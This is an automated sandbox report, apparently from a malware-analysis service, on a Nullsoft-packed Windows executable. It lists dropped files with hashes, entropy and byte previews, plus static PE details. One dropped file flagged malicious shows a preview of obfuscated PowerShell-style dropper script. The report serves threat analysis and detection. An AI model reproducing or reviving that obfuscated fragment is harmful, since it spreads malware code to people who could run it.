                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..*........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M*.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\Supratonsillar.ini

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 384x185, components 3
                                                                        Category:dropped
                                                                        Size (bytes):14049
                                                                        Entropy (8bit):7.91807748657587
                                                                        Encrypted:false
                                                                        SSDEEP:384:wqmHIc+9W7tPMa2+d7ubE2CwYyjyzzlpyCEysbOJbV2C:wqmocnd/aSwz2XX/sbEJD
                                                                        MD5:8AB3CA28CE62FC46C07B5B98FBBB414B
                                                                        SHA1:240E8583EFDC5A9C6D75BF7B11F262914BD04200
                                                                        SHA-256:C5A65D61DD4F44DEEDC787B8A3D6C4B09B38DC25EB93AD8FEDDA047C00C6CEA4
                                                                        SHA-512:295B01BD4821D508415FAC01E09EFA81B3CF4C73749CBD9BB58B578B26476E19CA2A08E67A11A60843CECFCE05FB5066B3DD277CC5CA0107D4283E8E992928ED
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..F.UG95a."..XD.0....QR.)..aqO.[....y.4...F.Bf46RJ......*....?D....O...P+eJ.s.[A.0c...j.I(....Q....t.}...q.+.G.I.....U. .#.R+...8...?*.5..Jw.....>....h..z]....}*...x.B.qLjB..j..SJ..4.Pi.f...A.].......#.p.OY..U.5....jG....i..+...C.....'Y.K.Wg.kM....+......b^!..|.Kk.9FMlZ.m.....s..H.C+.e.k.......1..RH.m.EmN.R/..rWz~.%IV.1\..sy.`..].4`0.W..H.!....i%..g5<..1.j

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\asaraceae.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 384x185, components 3
                                                                        Category:dropped
                                                                        Size (bytes):13561
                                                                        Entropy (8bit):7.944486430660756
                                                                        Encrypted:false
                                                                        SSDEEP:384:wqmHIc+9W7tPMa2+d7ubE2CwYyjyzzlpyCEysbOJbVD:wqmocnd/aSwz2XX/sbEJD
                                                                        MD5:B01D2EE27691E0946A05D90BFF5738FF
                                                                        SHA1:7202B8A8FA2CB0BE12C35E1DB38B73D7EF5BE2B3
                                                                        SHA-256:99A8FF2023B2897A6521E088258EBD61EF560283D294E395A6CE4671EE0E3FA6
                                                                        SHA-512:1916D6C935EEF69CAEA32989023F337AD1D68DFFD6A2E6018DFC010E3BFA3B70A0EBCA797446C46C35BC273C91D2005A117EA35704AED9FC4BBBB75A85F6506B
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..F.UG95a."..XD.0....QR.)..aqO.[....y.4...F.Bf46RJ......*....?D....O...P+eJ.s.[A.0c...j.I(....Q....t.}...q.+.G.I.....U. .#.R+...8...?*.5..Jw.....>....h..z]....}*...x.B.qLjB..j..SJ..4.Pi.f...A.].......#.p.OY..U.5....jG....i..+...C.....'Y.K.Wg.kM....+......b^!..|.Kk.9FMlZ.m.....s..H.C+.e.k.......1..RH.m.EmN.R/..rWz~.%IV.1\..sy.`..].4`0.W..H.!....i%..g5<..1.j

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\friezer.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
                                                                        Category:dropped
                                                                        Size (bytes):7274
                                                                        Entropy (8bit):7.778553745678111
                                                                        Encrypted:false
                                                                        SSDEEP:192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctc0an:7XzuOmvyfhEE25XvJ08
                                                                        MD5:D3B67F439E3520AD4222C98CA488BFA2
                                                                        SHA1:9CE0BBE7AEA677CD022980D1237690B66BF9C380
                                                                        SHA-256:43FB0CAAFF47E62E124A73C22E07E89D6D94BC93FF2A6DDA57A2C28A1225DFFD
                                                                        SHA-512:1EC28E17F10D8A2E6412281122F84AAB26210E8A6C99A60CD34F88E2222780419B285E4CCEEE16B7CB5F1B41BC8B343B39A0D280D5A861336B731F2A240E8AEE
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..*........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M*.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\kderegel.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 531x550, components 3
                                                                        Category:dropped
                                                                        Size (bytes):27142
                                                                        Entropy (8bit):7.937950694247041
                                                                        Encrypted:false
                                                                        SSDEEP:384:HPIGC4eyQ7QeqSad6dm8wme7yjVd/oZRLcz3jP2kjc7JKAWdylE8RcCfAhZwJ8a:HPw42hasAN7yjHQc3pA0LMDRcwJF
                                                                        MD5:541F2C5A945E473E104CB993414ACF54
                                                                        SHA1:E87A90C84328C40E059CD05F136235C1A9DDD9AE
                                                                        SHA-256:D3EFA687CCDF945CE7AE1C524BA2883057A0D00C6BF317DB5519164344188494
                                                                        SHA-512:FD5B135D735C334755763CCEE29861B68D10437938947A4E140576A3420DC73EE163FDB21A2082635848DC33F8A4614AB2BC0C1F6E9FF1EAE5FBA7E2BCA96468
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......&...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....y..M.'8.+9lf...QI.MH.j.O.k:..c...4.n...1..k..J.H.X.'...T.......:...z..^.=."..".G..[^...c..TmR...V.L..T....q.U94.$I.T&.....[...)S..0....{......T...Z.F..;U9IiW5.)..-..5`...0?.y..l63.....hA.\m.%.aI..J..(O......P...*..f.Y&je...N.....t....PR.E0..@...=izQE0....q..)..y.S@..PX...Al6..~.?..N..O>..,........$>..$u..,..)....".r..r-H.5(....U es.i.)...4.iM%Q"R.v

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\lorded.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 531x550, components 3
                                                                        Category:dropped
                                                                        Size (bytes):26575
                                                                        Entropy (8bit):7.946417329290275
                                                                        Encrypted:false
                                                                        SSDEEP:384:HPIGC4eyQ7QeqSad6dm8wme7yjVd/oZRLcz3jP2kjc7JKAWdylE8RcCfAhZQ:HPw42hasAN7yjHQc3pA0LMDRcQ
                                                                        MD5:B3C9708BAAA65457A17170269A21EF71
                                                                        SHA1:F2EAE9E9F236AF8A61A17BC765FBA90A8CE393F7
                                                                        SHA-256:0652B5053D759D94FE40A67BC2FF470A250533B75570F0D0D86A759681573B3E
                                                                        SHA-512:A7B5A431FDA7F30E601806D248302ACCF73D54C73723B900E0F9152D7D8F2A15A362A55C4059DA1BF7E6C5224E6CC04EAE201BD9FC25D95B3023C9D9E49233E9
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......&...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....y..M.'8.+9lf...QI.MH.j.O.k:..c...4.n...1..k..J.H.X.'...T.......:...z..^.=."..".G..[^...c..TmR...V.L..T....q.U94.$I.T&.....[...)S..0....{......T...Z.F..;U9IiW5.)..-..5`...0?.y..l63.....hA.\m.%.aI..J..(O......P...*..f.Y&je...N.....t....PR.E0..@...=izQE0....q..)..y.S@..PX...Al6..~.?..N..O>..,........$>..$u..,..)....".r..r-H.5(....U es.i.)...4.iM%Q"R.v

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\snusdaases.jpg

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 531x550, components 3
                                                                        Category:dropped
                                                                        Size (bytes):26001
                                                                        Entropy (8bit):7.948061981828881
                                                                        Encrypted:false
                                                                        SSDEEP:384:HPIGC4eyQ7QeqSad6dm8wme7yjVd/oZRLcz3jP2kjc7JKAWdylE8RcCfAhO:HPw42hasAN7yjHQc3pA0LMDRp
                                                                        MD5:47F9CE8203A2AF484EBF0EFB9AAC90AA
                                                                        SHA1:D696706CF587DA3AEAA852C0623EC0037CE429E8
                                                                        SHA-256:BE707A416458B30652EC5A6C36FCA438E8E3DE4341742646ECB4FDD4ED8A9947
                                                                        SHA-512:A7DC9F3D57C8D5A99F6D9827C8692A0A85FD3528BEB3D4DAC3861DF611123901FAF49A3853DE48681D72DA558262E10360A78CC4668AB638E66DB6141B05DE58
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......&...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....y..M.'8.+9lf...QI.MH.j.O.k:..c...4.n...1..k..J.H.X.'...T.......:...z..^.=."..".G..[^...c..TmR...V.L..T....q.U94.$I.T&.....[...)S..0....{......T...Z.F..;U9IiW5.)..-..5`...0?.y..l63.....hA.\m.%.aI..J..(O......P...*..f.Y&je...N.....t....PR.E0..@...=izQE0....q..)..y.S@..PX...Al6..~.?..N..O>..,........$>..$u..,..)....".r..r-H.5(....U es.i.)...4.iM%Q"R.v

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\tavse.gam

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):369267
                                                                        Entropy (8bit):1.2505498508943538
                                                                        Encrypted:false
                                                                        SSDEEP:3072:q4GegDIdTXvDmD7bAesUYZXiOcxlvD2srap7dG7kw/d+yIX2CoVN/18d1/MWmYB1:BIW+zx6PXU+
                                                                        MD5:C6FFD2E64ED2416142F50EA4046578B8
                                                                        SHA1:875FF4760B702CAA1D2AA7E1482D0468BB95850C
                                                                        SHA-256:90C089F5BBAA260A087BF1B8C5F56C14F0D3E4A369872AB1E429DB71A969B80F
                                                                        SHA-512:685D035FDBEFD3BCD3B703F6D7D5BB4FA7D242B62326052B279634DDCB7C3AD1100DF7C2730B5CCF647D0B4E43C26AB4FA97711013327204E162D7D3CEA4A6D2
                                                                        Malicious:false
                                                                        Preview:j................................................................................@......B.....k.g...........................................................y..................................i......N..................N........5................................................................................................................b........X.............B.............................].X................................................................................................................n....................VF...Z.........................................Z..........................{..................S..................................8.....E....................................................................................../.W...................:.........................................V...|e...........r.............................................................N..........................O........................................................k.......................

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\ungauntlet.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
                                                                        Category:dropped
                                                                        Size (bytes):7742
                                                                        Entropy (8bit):7.685816559459474
                                                                        Encrypted:false
                                                                        SSDEEP:192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctc0awWk/:7XzuOmvyfhEE25XvJ0//
                                                                        MD5:CAB6C7C8AB58D902E1836D53A688CD4A
                                                                        SHA1:55C46FA98306F5E0F35B89796891CA126E52F02A
                                                                        SHA-256:82B4B8B3994B4A9D277F249AC6D2B034715DA0F5BAE309604D3BF1CA7247B4E9
                                                                        SHA-512:9115FF2B00F98109B989DDEB316D5D6F1A1509DCFA56FE8ABB75F0753DE7BE0C8CD16C978F36CA46DFF5BA0A55E67A432077A14EBAFC1446260E7B249A938A3E
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..*........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M*.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\vejningers.jpg

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 384x185, components 3
                                                                        Category:dropped
                                                                        Size (bytes):12929
                                                                        Entropy (8bit):7.957757236123418
                                                                        Encrypted:false
                                                                        SSDEEP:384:wqmHIc+9W7tPMa2+d7ubE2CwYyjyzzlpyCEysbG:wqmocnd/aSwz2XX/sbG
                                                                        MD5:D80B9F37C8A58A34326507D15B2141F3
                                                                        SHA1:92A352F9BCF3E9231FB96F2EBCE0EEB3B28D53C3
                                                                        SHA-256:83BB4E7FFE9511AE104E48B1F9E350308AFAA12F12F8750170A7C6A956EA7238
                                                                        SHA-512:DD6CD1188BB082A1D336D0DCBEAD91B26B1EE045CD852B9CBF61DFEF11D7EC940199034C389FB30838B82EBB672622D3994409409C8A68834D3F276469E9C370
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..F.UG95a."..XD.0....QR.)..aqO.[....y.4...F.Bf46RJ......*....?D....O...P+eJ.s.[A.0c...j.I(....Q....t.}...q.+.G.I.....U. .#.R+...8...?*.5..Jw.....>....h..z]....}*...x.B.qLjB..j..SJ..4.Pi.f...A.].......#.p.OY..U.5....jG....i..+...C.....'Y.K.Wg.kM....+......b^!..|.Kk.9FMlZ.m.....s..H.C+.e.k.......1..RH.m.EmN.R/..rWz~.%IV.1\..sy.`..].4`0.W..H.!....i%..g5<..1.j

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\vitrifacture.txt

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
                                                                        Category:dropped
                                                                        Size (bytes):6748
                                                                        Entropy (8bit):7.868770137002905
                                                                        Encrypted:false
                                                                        SSDEEP:192:LXXQXQ7uxIm/3REK132D5phEiQirK5Xvctc0J:7XzuOmvyfhEE25XvJ0J
                                                                        MD5:9361066F2EAB82730A5F698F735ECF25
                                                                        SHA1:7279F63469EFC0AAF9FCF70D8ACCD623F7D5AC6B
                                                                        SHA-256:4976EE2C2C27F507B578F55C6323533DEE7B47E25877F8F51398AD34545497D0
                                                                        SHA-512:F706FB6DBD5596631AE35A2F6B8FD0D723BD46E6F646383245C470F57C2B3CEE2A82F4695E24D9E0A2F7382156EAAD4AE218443069C962B247015EC8429583EE
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..*........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M*.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Fossil.jpg

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 76x197, components 3
                                                                        Category:dropped
                                                                        Size (bytes):6028
                                                                        Entropy (8bit):7.934780456271549
                                                                        Encrypted:false
                                                                        SSDEEP:96:RhXE4WTXQUVsLLl9vaxwrBnNk/3REfi132Co5p7lrEik1MEirZ8Jcics9:LXXQXQ7uxIm/3REK132D5phEiQirK5X9
                                                                        MD5:F9D9FF81C5A1981E6D8D05FF64C375A3
                                                                        SHA1:A880B1EE40AF72076B8BC02BF62E89489A5481ED
                                                                        SHA-256:FA20D23F9216A071D4A75F1ED13515C02704746D091EF2B9D5C09896E5143534
                                                                        SHA-512:6D1CEA465CF4BC488C94AD875E9DE0EC4B73061CF94A2D6F200C7DA8DA472A83C2ADF6413383BAC18843BF9ED1FA5B0D633C326E82AEFCE532C8BF2512F83124
                                                                        Malicious:false
                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........L.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...U.Ar..~.<.[...~..U..n....G...(..*........6Q.K..........v....7\...$o@.t..y...^..>..C.~...^"..A$.p. ...... ..sK.5....N..\..........[]..J...yC...5G./.../E.1GD.6.rA.6...\.X...<.U.ir.hS.MI..#d.nR~.+...o..B.K.d..2@ ..>.....Mk...\Co..Xu..k.<.G...8...M*.}C.....R..G<w..+)8U.3\.g+7.z._.....).1..I..;pO?..'...G1.'......1..i...w....I..A....^i.?...N....'9...B..nQ.P

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Lisle.Fil

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):310172
                                                                        Entropy (8bit):7.730220826478408
                                                                        Encrypted:false
                                                                        SSDEEP:6144:vtlXxoirgTHS9GMQdWzWXWfldHMR2tWcTn6mVpJOwf0rjztxSXLyfu:VZxKS9MW6WddscQcTn66psW0DHS7yG
                                                                        MD5:C0AE77537787BD3E4FC226F700D6ABBC
                                                                        SHA1:7C51BA74161A9866CA1569257B45353F485947BB
                                                                        SHA-256:AE59AA2ADB65D3963B98EF51AB9FF0EF289CDD98C063CE9A29F375A38FD62293
                                                                        SHA-512:29525C27A856C80986392833666E70A02DE27CD95C7DA43FE022A5A0B3D2D0A8AB7CE5D8798708F20596E95282A353F57DCFED8C8F300DF58F93F7E80820D6F0
                                                                        Malicious:false
                                                                        Preview:...............}}}....*.......[....e.CCC........Z..h.....Y.........CC.....d.....p.........!..ooo..........)......................XXX...........................Z...................4..........C........yy.!!!.......T.v...............m...................SS.......n..4......................V........M...........r..........""...V..bb......r.........W...$$$..[...........O.|||..................................XX................~~..................................S.....fffff.........b..""".\\........XX...............%%..WWWW......n...R.u..................t.L....F......}..?..............uuu...t......^^.....BBBB....DD......AA.JJ..............[............99......#.>....VVVVVV.........E........vv..l..)...222222...........bb........$$$$$...........)))))...................>>.zz..../..FF.*.:..&..}}.........$$..............s......::.1..........QQ...........)..22..........66...LL..............................SSS..............................ff..Y....................q....WWWW..............................

                                                                        C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (3155), with CRLF, LF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):52995
                                                                        Entropy (8bit):5.328813408673782
                                                                        Encrypted:false
                                                                        SSDEEP:1536:yYXWMCcIl8U2gCVnaihuyUH6bGZpufwhFz5od:/hU2g6aYs6b+pvlE
                                                                        MD5:C740FC11F250034D77CB8DCA8A40FE8F
                                                                        SHA1:9758084B008638DA2208BB32908340B6627C17AA
                                                                        SHA-256:F995D79992D17DC66BE7688AFCAD5B741C0EDDEE7A427318581091058F140D49
                                                                        SHA-512:7D302BC092D5C1518CE8606A212C5CA04E4A3DBCFD27F0B2E1617D857382312ED004373C4A5D151A07EC49E131177C7D90D4741CF9F1EF15BB201E285D2D9A6C
                                                                        Malicious:true
                                                                        Preview:$stempelafgiftsloven=$Reexcavatedrtendes;........$Semiaffectionate = @'.Gnome.C par$CivilEUdklifTthedtMultieActinrFrilgaBaronaInddrrSubtrsGaskif Madee MonarForgeiBenz.eSequarFamilnTab le CorvnForpltPreineKorpsrknaplpFrakeo unvalSkippe DivirModtaeEks.e=Kbyte$OccurE DyrbcErhveoEndomn Touro D pwmSmeltiDepresNondoiPara.nEp emgHyper;Res,r.PlowlfPeb,ruBragenLat icBaglytBronzimari oEfternBen a WagsoPSpicerPiratgAkantnDawt iSpagenhulspgUnsexeL ghtrTambos Delg Pla f( Tawp$No arR langeRhi.oeHjforxRske cadornaAand vKaldea SkabtFortye Hoerd Skel, Epit$SkrabNTarifa.athinOverliTegntt ThuniOpusccQueb.)Brne. nde{ Poc..Assis.P,eud$BefamCG,lfwaKrydst ThrarRepr iDampioStundnNeoloaNs nesTeste agel(potteO edstvLunkheHall rUnporgOverta Cardv Disc Ti.l'Bankr Gu.rTSp,yrh Baroe LyseoTyve,$roansPAs neoKnipspNuptio AtomvGrejeR Koka Sin,wtAgg,urbrsbyoAu.icsAfviseRedeyd M lieSha ltSt.mnr Sto,oSynaeeOphid nate.iffelKonf.fUdflus Tilbx Til K A staStorm.Stirps Tatte PenscRegin S udgDForhaisympt,BuskmsHenfaaMen

                                                                        C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:JSON data
                                                                        Category:dropped
                                                                        Size (bytes):55
                                                                        Entropy (8bit):4.306461250274409
                                                                        Encrypted:false
                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                        Malicious:false
                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.596359760786588
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:GyGE2VaBFL.exe
                                                                        File size:791'053 bytes
                                                                        MD5:d8eacf83ca07943696bf5e23528cc348
                                                                        SHA1:1aa708342f955f268f43cbd7705dc1497cf91d46
                                                                        SHA256:0a494235e29b9a51ba2120377cbc09ae119c0e6eda64072218343e69c85d1783
                                                                        SHA512:72d24f737152a33fb7b9bb38b4dc9886711f8a1cd4089021aa08482db193221359cac6836f63362994e988f02788e00dcb0a836c0387df19f04bb557561f8fec
                                                                        SSDEEP:12288:2tlyuHaQfKR13fxFozNXofFxNc3pipkyfGSw:AbQRdpAiF3c5yfFw
                                                                        TLSH:4EF4F165AB69CD03E3C205B0C5B7D3B967788E54163F82228BD1BE5BF97CBE10D19212
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@

                                                                        File Icon

                                                                        Icon Hash:49c5e9ec6d5d8413

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x403325
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x60FC909C [Sat Jul 24 22:13:48 2021 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:ced282d9b261d1462772017fe2f6972b

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 00000184h
                                                                        push ebx
                                                                        push esi
                                                                        push edi
                                                                        xor ebx, ebx
                                                                        push 00008001h
                                                                        mov dword ptr [esp+18h], ebx
                                                                        mov dword ptr [esp+10h], 0040A198h
                                                                        mov dword ptr [esp+20h], ebx
